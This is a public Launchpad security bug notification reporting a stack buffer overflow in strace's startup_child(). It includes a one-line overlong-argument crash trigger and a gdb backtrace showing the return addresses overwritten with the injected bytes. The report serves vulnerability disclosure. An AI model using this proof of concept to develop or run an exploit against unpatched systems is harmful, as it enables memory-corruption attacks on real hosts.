*** This bug is a security vulnerability ***
Public security bug reported:
Tested Version : strace-4.9 (from strace sourceforge), strace-4.8 (apt-get
install strace)
Environment : Ubuntu 14.04.1 LTS x86_64
Details:
stack buffer overflow in startup_child() strace.c
Input length check could be bypassed using long string without having '/'
character.
So, the strcpy() function in PATH concat processing code starts to overwrite
stack data.
-------------- TEST PAYLOAD
abc@ubuntu:~$ ./strace `perl -e 'print "a"x5042'`
Segmentation fault
-------------- Backtrace with debugging symbol
(gdb) r `perl -e 'print "a"x5042'`
Starting program: /home/abc/strace-4.9/strace `perl -e 'print "a"x5042'`
Program received signal SIGSEGV, Segmentation fault.
__GI_getenv (name=0x7fe3b8107b5b "NGUAGE", name@entry=0x7fe3b8107b59
"LANGUAGE") at getenv.c:85
85 getenv.c: No such file or directory.
(gdb) bt
#0 __GI_getenv (name=0x7fe3b8107b5b "NGUAGE", name@entry=0x7fe3b8107b59
"LANGUAGE") at getenv.c:85
#1 0x00007fe3b7fbc681 in guess_category_value (categoryname=0x7fe3b80f16b3
<_nl_category_names+51> "LC_MESSAGES", category=5)
at dcigettext.c:1372
#2 __dcigettext (domainname=0x7fe3b8107a99 <_libc_intl_domainname> "libc",
msgid1=0x7fe3b81081ac "File name too long",
msgid2=msgid2@entry=0x0, plural=plural@entry=0, n=n@entry=0,
category=category@entry=5) at dcigettext.c:573
#3 0x00007fe3b7fbb5df in __GI___dcgettext (domainname=<optimized out>,
msgid=<optimized out>, category=category@entry=5)
at dcgettext.c:52
#4 0x00007fe3b801398e in __GI___strerror_r (errnum=errnum@entry=36,
buf=buf@entry=0x0, buflen=buflen@entry=0) at _strerror.c:71
#5 0x00007fe3b80138cf in strerror (errnum=errnum@entry=36) at strerror.c:32
#6 0x000000000041230f in verror_msg (err_no=36, fmt=fmt@entry=0x4273da "Can't
stat '%s'", p=p@entry=0x7fff6b28dbf8) at strace.c:277
#7 0x000000000041315a in perror_msg_and_die (fmt=fmt@entry=0x4273da "Can't
stat '%s'") at strace.c:323
#8 0x000000000041371e in startup_child (argv=0x7fff6b28f160) at strace.c:1220
#9 0x6161616161616161 in ?? ()
#10 0x6161616161616161 in ?? ()
#11 0x6161616161616161 in ?? ()
#12 0x6161616161616161 in ?? ()
#13 0x6161616161616161 in ?? ()
** Affects: strace (Ubuntu)
Importance: Undecided
Status: New
** Information type changed from Private Security to Public Security
--
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1426635
Title:
strace stack buffer overflow
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/strace/+bug/1426635/+subscriptions
--
ubuntu-bugs mailing list
[email protected]
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
